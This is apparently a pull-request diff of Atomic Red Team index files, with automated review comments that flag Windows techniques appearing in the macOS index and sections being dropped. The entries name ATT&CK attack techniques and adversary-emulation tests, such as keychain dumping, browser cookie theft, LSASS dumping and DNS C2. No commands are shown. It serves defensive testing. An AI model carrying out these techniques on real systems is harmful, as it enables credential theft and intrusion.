- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #8: MacOS Swift Keylogger [macos]
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- - Atomic Test #1: Keychain Dump [macos]
- - Atomic Test #2: Export Certificate Item(s) [macos]
- - Atomic Test #3: Import Certificate Item(s) into Keychain [macos]
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
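Review bot: three changes in this hunk need justification in the PR description. First, the whole # privilege-escalation section (T1037 through T1078.003, including linked tests such as "Sudo usage", the Cron tests and "Launch Daemon") is deleted here and no visible hunk re-adds it; the shift in new-file line numbers (-355 to +517) is consistent with a reorder, but please confirm the section still exists elsewhere in the regenerated file rather than being dropped. Second, in lateral-movement the macOS/Linux-relevant T1021.004 Remote Services: SSH and T1563.001 SSH Hijacking are removed while only Windows entries (SMB/Windows Admin Shares, Windows Remote Management, DCOM, Pass the Ticket, Pass the Hash, RDP, RDP Hijacking) are added. Third, in credential-access T1556.003 Pluggable Authentication Modules, T1555.002 Securityd Memory and T1555.001 Keychain, the last with three existing [macos] atomic tests, are removed and replaced by Security Account Manager, LSA Secrets, Credentials in Registry and Password Filter DLL placeholders. Taken together this reads like a platform-mapping regression in the index generator rather than an intended content change; verify against the technique platform lists before merging.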
@@ -479,17 +576,21 @@
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- - Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
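Review bot: T1552.003 Unsecured Credentials: Bash History and its linked test "Search Through Bash History [linux, macos]" are removed, which drops a real test from the index rather than a placeholder; confirm that the test's supported platforms changed or the test was deleted, otherwise this is a generator regression. The added T1003.001 LSASS Memory, T1003.005 Cached Domain Credentials, T1558.001 Golden Ticket, T1552.006 Group Policy Preferences and T1556.008 Network Provider DLL are all Windows or Active Directory techniques and look out of place beside the [linux, macos] entries in the same section.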
@@ -500,10 +601,19 @@
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
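Review bot: every placeholder added in this hunk (T1187 Forced Authentication, T1558.002 Silver Ticket, T1555.004 Windows Credential Manager, T1556.001 Domain Controller Authentication, T1556.005 Reversible Encryption, T1003.003 NTDS, T1558.003 Kerberoasting, T1003.006 DCSync, T1056.004 Credential API Hooking) is Windows or Active Directory specific, while the existing entry next to them is "SSH Credential Stuffing From MacOS [macos]". Please check the platform filter that produces these rows; if it is intended that this index now carries Windows techniques, say so in the PR description.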
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
@@ -511,6 +621,7 @@
- [T1016.001 System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md)
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
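Review bot: T1615 Group Policy Discovery is a Windows domain technique; its appearance between entries tagged [macos, linux] suggests the generator's platform filter is emitting Windows techniques into this index, which is worth checking before merge.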
@@ -539,6 +650,7 @@
- Atomic Test #33: sysctl to gather macOS hardware info [macos]
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
- Atomic Test #1: Delay execution with ping [linux, macos]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -549,6 +661,7 @@
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
@@ -564,6 +677,7 @@
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #8: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1614 System Location Discovery](../../T1614/T1614.md)
- Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
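Review bot: T1012 Query Registry is a Windows-only technique (there is no Registry on macOS or Linux), so it should not be generated into an index whose neighbouring entries are "Examine password policy - macOS [macos]" and the curl geolocation test for macOS; check the platform filter.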
@@ -580,37 +694,6 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
-# execution
-- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- - Atomic Test #1: AppleScript [macos]
-- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- - Atomic Test #1: Launchctl [macos]
-- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- - Atomic Test #2: Command-Line Interface [linux, macos]
- - Atomic Test #14: Shell Creation using awk command [linux, macos]
- - Atomic Test #15: Creating shell using cpan command [linux, macos]
- - Atomic Test #17: emacs spawning an interactive system shell [linux, macos]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -625,8 +708,10 @@
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
@@ -657,6 +742,7 @@
- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
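Review bot: the entire # execution section (T1129 through T1053.002, including linked tests for Cron, AppleScript, Launchctl and the five Bash tests) is deleted in this hunk and no visible hunk re-adds it. The change in new-file line numbers in the header (-580 to +694) is consistent with sections having been reordered, but please confirm the section is present elsewhere in the regenerated file before merging; silently losing the execution tactic from this index would be a regression that the diff alone cannot rule out.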
diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md
index 90952a5669..e16f79be66 100644
--- a/atomics/Indexes/Indexes-Markdown/office-365-index.md
+++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md
@@ -16,26 +16,17 @@
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
# collection
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
- Atomic Test #1: Office365 - Email Forwarding [office-365]
- [T1114.002 Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md)
- Atomic Test #1: Office365 - Remote Mail Collected [office-365]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
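Review bot: the whole # impact section (T1498.001, T1499.003, T1499.004, T1498.002, T1499.002, T1657, T1531, T1499, T1498) is dropped from the Office 365 index, and the later hunk headers in this file shift by exactly the lines removed here (-9, then -8, then -7), so nothing in this file relocates it. Confirm that the impact tactic is intentionally no longer mapped to the Office 365 platform; at least T1531 Account Access Removal and T1657 Financial Theft are reasonable for that platform, so a generator mapping change is a plausible cause. The added T1119 Automated Collection and T1213.005 Messaging Applications placeholders look fine.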
@@ -55,6 +46,7 @@
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -65,6 +57,7 @@
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -82,7 +75,6 @@
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
@@ -130,3 +122,7 @@
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# impact
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
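Review bot: the re-added `# impact` section contains only T1657 Financial Theft and T1531 Account Access Removal, but the block deleted at the start of the first hunk in this file also contained the impact techniques T1499.004 Application or System Exploitation, T1498.002 Reflection Amplification, T1499.002 Service Exhaustion Flood, T1499 Endpoint Denial of Service and T1498 Network Denial of Service, none of which reappear here. If they were dropped because the upstream ATT&CK data no longer maps them to this platform, say so in the PR description; otherwise the regeneration silently lost five placeholder rows. Separately, the last `+` line appends an empty line at end of file; no other hunk in this diff touches an end-of-file, so confirm the generator writes the same file ending for every index rather than only this one.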
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e5dec58be3..7be4e1b9b5 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -184,6 +184,7 @@
- Atomic Test #10: Event Log Manipulations- Time slipping via Powershell [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
@@ -481,6 +482,7 @@
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -527,7 +529,10 @@
- Atomic Test #1: Hidden Window [windows]
- Atomic Test #2: Headless Browser Accessing Mockbin [windows]
- Atomic Test #3: Hidden Window-Conhost Execution [windows]
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
@@ -680,6 +685,7 @@
- Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -961,6 +967,7 @@
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1061,6 +1068,7 @@
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
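Review bot: this is the second insertion of the identical `T1098.007 Additional Local or Domain Groups` placeholder in this file (the first is in the hunk at `@@ -680,6 +685,7 @@`). The surrounding context differs (T1137.005 Outlook Rules here versus T1053 Scheduled Task/Job and T1055.003 there), so these are two tactic sections rather than an accidental duplicate row; the PR description should state that T1098.007 is being added under two tactics so the repeated line is not mistaken for a generator bug.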
@@ -1242,6 +1250,7 @@
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
